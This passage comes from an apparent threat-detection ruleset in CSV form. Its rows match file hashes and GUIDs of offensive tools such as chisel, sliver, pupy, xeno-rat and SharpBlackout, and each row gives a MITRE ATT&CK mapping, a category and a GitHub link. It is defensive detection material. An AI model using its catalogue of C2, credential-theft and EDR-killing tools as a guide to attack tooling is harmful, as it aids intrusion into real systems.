Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5*",".{0,1000}06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06B2B14A-CE87-41C0-A77A-2644FE3231C7*",".{0,1000}06B2B14A\-CE87\-41C0\-A77A\-2644FE3231C7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd*",".{0,1000}06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34*",".{0,1000}06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81*",".{0,1000}06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e*",".{0,1000}06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471*",".{0,1000}06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62*",".{0,1000}06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*",".{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*07628592-5A22-4C0A-9330-6C90BD7A94B6*",".{0,1000}07628592\-5A22\-4C0A\-9330\-6C90BD7A94B6.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986*",".{0,1000}07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a*",".{0,1000}07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. 
cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*",".{0,1000}07DFC5AA\-5B1F\-4CCC\-A3D3\-816ECCBB6CB6.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956*",".{0,1000}07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac*",".{0,1000}07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5*",".{0,1000}080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9*",".{0,1000}0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157*",".{0,1000}08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf*",".{0,1000}083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*",".{0,1000}086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd*",".{0,1000}087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4*",".{0,1000}088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a*",".{0,1000}089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*",".{0,1000}08AEC00F\-42ED\-4E62\-AE8D\-0BFCE30A3F57.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35*",".{0,1000}08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995*",".{0,1000}08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2*",".{0,1000}08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D*",".{0,1000}08DBC2BF\-E9F3\-4AE4\-B0CC\-6E9C8767982D.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d*",".{0,1000}08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*",".{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" 
"*09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4*",".{0,1000}09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48*",".{0,1000}09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47*",".{0,1000}0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0971A047-A45A-43F4-B7D8-16AC1114B524*",".{0,1000}0971A047\-A45A\-43F4\-B7D8\-16AC1114B524.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173*",".{0,1000}09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad*",".{0,1000}09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e*",".{0,1000}09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2*",".{0,1000}099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7*",".{0,1000}09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956*",".{0,1000}09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4*",".{0,1000}09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba*",".{0,1000}09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902*",".{0,1000}09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd*",".{0,1000}0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*",".{0,1000}0A1C2C46\-33F7\-4D4C\-B8C6\-1FC9B116A6DF.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5*",".{0,1000}0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0A2B3F8A-EDC2-48B5-A5FC-DE2AC57C8990*",".{0,1000}0A2B3F8A\-EDC2\-48B5\-A5FC\-DE2AC57C8990.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense 